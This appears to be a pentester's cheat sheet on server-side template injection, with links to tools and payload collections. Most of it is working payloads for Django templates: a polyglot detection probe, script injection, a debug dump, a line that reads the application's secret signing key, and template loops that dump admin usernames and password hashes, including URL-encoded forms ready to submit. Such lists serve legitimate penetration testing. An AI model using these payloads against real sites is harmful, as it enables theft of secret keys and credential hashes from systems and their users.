SSTI

Detection

${{<%[%'"}}%\.

A Pentester’s Guide to Server Side Template Injection (SSTI) | Cobalt Blog

Django Templates engine

GitHub - Lifars/davdts: Simple Django to show post-exploitation options when server-side template injection (SSTI) is present in app using Django Templates.GitHub

Cross-site scripting:

{{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }}

Debug information leak:

{% debug %}

Leaking app’s Secret Key (assumes CookieStorage being first message storage):

{{ messages.storages.0.signer.key }}

Admin Site URL leak:

{% include 'admin/base.html' %}

Admin username & password hash leak (assumes admin_log records exist):

{% load log %}{% get_admin_log 10 as log %}{% for e in log %} {{e.user.get_username}} : {{e.user.password}}{% endfor %}

only username

{%25+load+log+%25}{%25+get_admin_log+10+as+log+%25}{%25+for+e+in+log+%25}{{+e.user.username+}}{%25+endfor+%25} 

only password

{%25+load+log+%25}{%25+get_admin_log+10+as+log+%25}{%25+for+e+in+log+%25}{{+e.user.password+}}{%25+endfor+%25} 

Jinja2

{% if 'chiv' == 'chiv' %} a {% endif %}

Jinja2 SSTI Research - HackMDHackMD

Tools

GitHub - vladko312/SSTImap: Automatic SSTI detection tool with interactive interfaceGitHub

Resource

PayloadsAllTheThings/Server Side Template Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub